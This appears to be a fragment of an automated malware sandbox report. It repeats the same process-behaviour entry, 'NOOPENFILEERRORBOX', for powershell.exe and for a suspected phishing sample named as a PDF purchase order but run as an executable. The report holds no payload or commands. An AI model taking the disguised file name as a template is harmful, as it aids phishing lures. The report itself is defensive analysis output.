                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
